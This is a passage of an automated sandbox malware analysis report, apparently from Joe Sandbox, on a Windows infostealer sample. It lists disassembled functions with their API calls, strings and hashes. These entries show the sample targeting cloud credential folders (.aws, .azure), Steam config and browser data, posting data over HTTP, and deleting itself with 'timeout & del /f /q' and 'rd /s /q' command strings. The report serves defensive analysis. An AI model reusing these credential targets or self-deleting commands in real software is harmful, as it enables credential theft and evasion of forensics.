                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$memset$memcmpstrlen$FileFindFirstFolderPathlstrcpywsprintf
                                                                                                                                                                                                                                                                                                  • String ID: JB$\.IdentityService\$\.aws\$\.azure\
                                                                                                                                                                                                                                                                                                  • API String ID: 3008122021-3834632163
                                                                                                                                                                                                                                                                                                  • Opcode ID: a98f44546dc83d83092c0b59d743b05ef3ed3a32d71f5366ac4852f18bdd0379
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9794ee9d7d5702d65981f79f32deebafb897a1fd212e6a52f5b9a62acbb35f13
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a98f44546dc83d83092c0b59d743b05ef3ed3a32d71f5366ac4852f18bdd0379
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF61BF71900748A7DB00EF75D9C69E97368BF98308F40925AFD056A143EB78EAC9C7D4
                                                                                                                                                                                                                                                                                                  Function 00417270 Relevance: 20.5, APIs: 9, Strings: 2, Instructions: 1231networkstringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108B0: GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108B0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108B0: GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,?,?,00000000,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 004172E5
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00418606), ref: 004172EC
                                                                                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00418606), ref: 0041730C
                                                                                                                                                                                                                                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 004175AD
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET ref: 00417682
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET ref: 004176A6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041055C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: GetVolumeInformationA.KERNEL32 ref: 004105AE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0041060D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 0041061B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: wsprintfA.USER32 ref: 00410652
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: lstrcatA.KERNEL32(00000000,00421178), ref: 00410661
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: lstrlenA.KERNEL32(00000000,?), ref: 00410687
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402AA0: InternetOpenA.WININET(?,?,?,?,?), ref: 00402B3A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402AA0: StrCmpCA.SHLWAPI(?,https,?,?,?,?,?), ref: 00402B49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004132F0: StrCmpCA.SHLWAPI(00000000,block), ref: 00413315
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004132F0: ExitProcess.KERNEL32 ref: 0041331D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403920: InternetOpenA.WININET(?,?,?,?,?), ref: 004039B9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403920: StrCmpCA.SHLWAPI(?,https,?,?,?,?,?), ref: 004039C8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00412C40: strtok_s.MSVCRT ref: 00412C64
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00412C40: strtok_s.MSVCRT ref: 00412CA9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040E440: StrCmpCA.SHLWAPI(00000000,chrome), ref: 0040E4B3
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,?,?,?,?), ref: 00417C10
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403920: InternetConnectA.WININET ref: 00403B08
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403920: HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00403B4B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403920: InternetSetOptionA.WININET(?,0000001F,00010300,00000004), ref: 00403B75
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00412E50: strtok_s.MSVCRT ref: 00412E74
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00412F60: strtok_s.MSVCRT ref: 00412F88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416FC0: lstrlenA.KERNEL32(00000000), ref: 00417011
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414FE0: RegOpenKeyExA.KERNEL32(80000001,Software\Valve\Steam,00000000,00020119,?), ref: 0041506F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414FE0: RegQueryValueExA.ADVAPI32(?,SteamPath,00000000,00000000,?,000000FF), ref: 00415090
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414FE0: RegCloseKey.ADVAPI32(?), ref: 00415099
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414FE0: lstrcatA.KERNEL32(?,?,?,00000104), ref: 004150B8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414FE0: lstrcatA.KERNEL32(?,\config\), ref: 004150C4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890, xrefs: 00417C0B
                                                                                                                                                                                                                                                                                                  • C:\ProgramData\, xrefs: 0041756F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Open$Internet$Heaplstrcatlstrcpylstrlenstrtok_s$Process$AllocCloseCreateDirectoryEvent$ConnectExitHandleHttpInformationNameOptionQueryRequestUserValueVolumeWindowswsprintf
                                                                                                                                                                                                                                                                                                  • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890$C:\ProgramData\
                                                                                                                                                                                                                                                                                                  • API String ID: 818183501-1067945926
                                                                                                                                                                                                                                                                                                  • Opcode ID: 253828e2193622bca8c3790444a1af86ecf04706f1a61c859db2bb880bb83f3a
                                                                                                                                                                                                                                                                                                  • Instruction ID: d3f20ebcfaa0f86e13ddee9407f56ad69643857b77905c87f50bde3cae6408d9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 253828e2193622bca8c3790444a1af86ecf04706f1a61c859db2bb880bb83f3a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43C2A331C10B599BDB11EFB5C9815EEB378BF18308F00964EE85567142EB78BAC9CB94
                                                                                                                                                                                                                                                                                                  Function 0040E440 Relevance: 18.1, APIs: 6, Strings: 4, Instructions: 598COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,chrome), ref: 0040E4B3
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040E740
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,opera), ref: 0040E5B9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040B4E0: StrCmpCA.SHLWAPI(00000000,Opera GX,0042150A,0042150A), ref: 0040B523
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,chrome), ref: 0040E923
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: Stable\$chrome$firefox$opera
                                                                                                                                                                                                                                                                                                  • API String ID: 3722407311-3146807071
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6706b4d3de68381de9acf2f3cf5a3500a8a77dcd0908f9563c4221972a14ca8e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 22bc5863ea798df5109445d1e364a8a74c8a3d857c00c7bd5e27f083e93039e9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6706b4d3de68381de9acf2f3cf5a3500a8a77dcd0908f9563c4221972a14ca8e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94429131D00B099BDB05EF75C981AEAB7B4FF18308F008159F9556B252EB38BAD5CB94
                                                                                                                                                                                                                                                                                                  Function 00410540 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 133memorystringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041055C
                                                                                                                                                                                                                                                                                                  • GetVolumeInformationA.KERNEL32 ref: 004105AE
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0041060D
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 0041061B
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00410652
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00421178), ref: 00410661
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?), ref: 00410687
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcatlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %08lX%04lX%lu$:\$C
                                                                                                                                                                                                                                                                                                  • API String ID: 1059865016-545181305
                                                                                                                                                                                                                                                                                                  • Opcode ID: 90bb885e6cb9c3f254673d7949eac57a71e00247e07ca877e6107e12700a4b67
                                                                                                                                                                                                                                                                                                  • Instruction ID: daccc5cf811b00eb36f485bb9bb5cfb034b4705064687d02f987ca2459062bbc
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90bb885e6cb9c3f254673d7949eac57a71e00247e07ca877e6107e12700a4b67
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6141D4705083107BD301BB718C85BBF7AE99FC5784F00491EF58597291EBBC99829BAA
                                                                                                                                                                                                                                                                                                  Function 00418400 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 108COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041841D
                                                                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00418444
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 0041854E
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00418573
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00418584
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$memset$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: " & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
                                                                                                                                                                                                                                                                                                  • API String ID: 86853776-1686486140
                                                                                                                                                                                                                                                                                                  • Opcode ID: cf68e5ffe9d5c94084dc0a4ed0001313601785bbf26bd63883070f90d5ca4861
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7bf5b1220a567134bc8680c304d03b75e5346a68b302ecb6bd04b7556a355826
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf68e5ffe9d5c94084dc0a4ed0001313601785bbf26bd63883070f90d5ca4861
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3431B130B043446BE200AB6298D67BF77A69BD574CF00451EF4451A282DFBC6DC98B9B
                                                                                                                                                                                                                                                                                                  Function 00407110 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringsleepCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,ChromeBuildTools,00000104), ref: 00407130
                                                                                                                                                                                                                                                                                                  • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00407142
